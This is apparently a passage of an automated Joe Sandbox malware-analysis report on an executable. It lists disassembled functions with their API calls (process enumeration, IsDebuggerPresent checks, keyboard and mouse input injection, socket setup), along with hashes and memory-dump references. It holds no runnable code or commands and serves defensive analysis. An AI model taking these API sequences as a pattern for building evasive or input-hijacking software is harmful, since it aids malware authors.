                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 540024437-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044663B Relevance: 11.4, APIs: 1, Strings: 5, Instructions: 895COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: ERCP$VUUU$VUUU$VUUU$XjH
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 0-2872873767
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: d175e7d0ae6fb3d700f9da8fb6b70819649eb02c4ceaf458d011f7582104736e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34fecdbc504fccc055e136d4951117c2a740426f4eee1b738e863fbded63ce7f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D772D871A042198BEF24CF58C8807AEB7F1EB42314F25829BD859A7380D7799DC5CF5A
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004755C4 Relevance: 10.6, APIs: 7, Instructions: 148processCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32 ref: 00475608
                                                                                                                                                                                                                                                                                                                                                                                                                                • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00475618
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wsplitpath.LIBCMT ref: 00475644
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 00475657
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 0047567B
                                                                                                                                                                                                                                                                                                                                                                                                                                • Process32NextW.KERNEL32(00000000,?), ref: 004756AB
                                                                                                                                                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004756BA
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wcsicoll__wsplitpath__wsplitpath_helper_wcscat
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2547909840-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 52239f647ae7113ca4c6e3167181772f82882466072c53a1302db900a9aecbbd
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9e44ac92eedd99fdf3f2932738b6949334d3f24a3592eb41664da5fdf167909f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B3518671900618ABDB10DF55CD85FDE77B8EF44704F1084AAF509AB282DA75AF84CF68
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00452492 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128filesleepCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                                                                                                                                                                                                                                                                                                                                                                                                • FindClose.KERNEL32(?), ref: 004525FF
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Find$File$CloseFirstNextSleep_memmove_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: *.*$\VH
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2786137511-2657498754
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0041A208 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                                                                                                                                                                                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                                                                                                                                                                                                                                                                                                                                                                                                • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: pqI
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2579439406-2459173057
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046CEF3 Relevance: 9.2, APIs: 6, Instructions: 231comCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • OleInitialize.OLE32(00000000), ref: 0046CF63
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0046CF75
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateBindCtx.OLE32(00000000,?), ref: 0046D01F
                                                                                                                                                                                                                                                                                                                                                                                                                                • MkParseDisplayName.OLE32(?,?,?,?), ref: 0046D065
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00451B42: GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C0E
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00451B42: VariantCopy.OLEAUT32(?,?), ref: 00451C27
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00451B42: VariantClear.OLEAUT32(?), ref: 00451CA1
                                                                                                                                                                                                                                                                                                                                                                                                                                • CLSIDFromProgID.OLE32(00000000,?,?), ref: 0046D10B
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetActiveObject.OLEAUT32(?,00000000,?), ref: 0046D125
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Variant$Copy$ActiveBindClearCreateDisplayErrorFromInitializeLastNameObjectParseProg_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2728119192-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 429766a7b40452b835184f2de8aa00b1b4329a4e08ed21bdbbee089f0e3e7d6f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 654cbfa1d8fefa06abeba6563afdd6e3d5f820db169d2b444807b365abf91408
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 429766a7b40452b835184f2de8aa00b1b4329a4e08ed21bdbbee089f0e3e7d6f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D815E71604301ABD700EF65DC85F6BB3E8BF88704F10491EF64597291E775E905CB6A
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0043333C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00433349
                                                                                                                                                                                                                                                                                                                                                                                                                                • mouse_event.USER32(00000800,00000000,00000000,00000078,00000000), ref: 0043335F
                                                                                                                                                                                                                                                                                                                                                                                                                                • __wcsicoll.LIBCMT ref: 00433375
                                                                                                                                                                                                                                                                                                                                                                                                                                • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0043338B
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __wcsicollmouse_event
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: DOWN
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1033544147-711622031
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c5effa3e7e2998e6ee15a8e10ce6e2e5d36a5fc043d4170c53cc9f091e4fe068
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3af7a305a716ba131119f47d61043d9bc75f7fbd5de0530911e4e2de0579c383
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 78F0A0726846103AF80026947C02EFB334C9B26767F004023FE0CD1280EA59290557BD
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044C37A Relevance: 7.6, APIs: 5, Instructions: 145windowkeyboardCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyboardState.USER32(?), ref: 0044C3D2
                                                                                                                                                                                                                                                                                                                                                                                                                                • SetKeyboardState.USER32(00000080), ref: 0044C3F6
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C43A
                                                                                                                                                                                                                                                                                                                                                                                                                                • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C472
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendInput.USER32(00000001,?,0000001C), ref: 0044C4FF
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: KeyboardMessagePostState$InputSend
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3031425849-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ca9f4cb769efad0e1be190fe8763212e5a79bd7c4ee8908ff6f5a5d8a4a0dc9b
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ab52cc7f1a00f618f34bf6b1006ae93bda3478e58ada741bb1ac89fd44d8d1c
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D415D755001082AEB109FA9DCD5BFFBB68AF96320F04815BFD8456283C378D9518BF8
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00476619 Relevance: 7.6, APIs: 5, Instructions: 140networkCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                                                                                                                                                                                                                                                                                                                                                                • socket.WSOCK32(00000002,00000002,00000011,?,00000000), ref: 0047666F
                                                                                                                                                                                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 00476692
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorLastinet_addrsocket
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4170576061-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: b6cffcacb6afaf0b8cd9bee7f3c7ce362d61c656181a10c6507bcc72ef542d5a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: beba4ad3326242fe02a37a331f69581919bdb462f679bf8c0e3d41d719e28549
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 604129326002005BD710EF39DC86F5A73D59F44728F15866FF944AB3C2DABAEC418799
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0047A330 Relevance: 7.6, APIs: 5, Instructions: 71windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                                                                                                                                                                                                                                                                                                                                • IsWindowVisible.USER32 ref: 0047A368
                                                                                                                                                                                                                                                                                                                                                                                                                                • IsWindowEnabled.USER32 ref: 0047A378
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32(?,?,?,00000001), ref: 0047A385
